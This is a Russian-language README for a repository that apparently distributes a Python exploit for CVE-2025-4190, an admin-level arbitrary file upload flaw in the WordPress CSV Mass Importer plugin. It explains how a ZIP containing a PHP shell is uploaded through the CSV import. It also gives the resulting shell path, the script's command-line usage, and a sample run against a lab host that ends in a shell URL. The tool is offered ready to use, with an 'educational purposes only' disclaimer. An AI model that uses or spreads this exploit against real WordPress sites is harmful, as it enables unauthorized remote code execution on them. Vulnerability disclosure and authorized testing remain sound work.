
CSV Mass Importer <= 1.2 - Admin+ Произвольная загрузка файлов
Плагин CSV Mass Importer (≤ 1.2) для WordPress содержит уязвимость Admin+ Arbitrary File Upload (произвольная загрузка файлов администратором).
Из-за неправильной проверки загружаемых файлов пользователи с высокими привилегиями (например, администраторы) могут загружать произвольные файлы на сервер, даже если это должно быть ограничено — например, в настройках multisite.
Эта уязвимость позволяет атакующему загрузить PHP-оболочки или вредоносные файлы, что приводит к удаленному выполнению кода (RCE) на сервере.
Обнаружено Nxploited (Khaled Alenazi).
Плагин неправильно проверяет загружаемые файлы при использовании функции импорта CSV.
Созданный ZIP-файл, содержащий PHP-оболочку, можно загрузить и распаковать в общедоступную директорию.
Пример пути к оболочке:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
В этом репозитории находится готовый эксплойт-скрипт на Python: 4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
Этот код предоставлен только в образовательных целях.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом.
Используйте ответственно и только в системах, на которые у вас есть разрешение на тестирование.
Обнаружено и разработано Khaled Alenazi (Nxploited) 🌟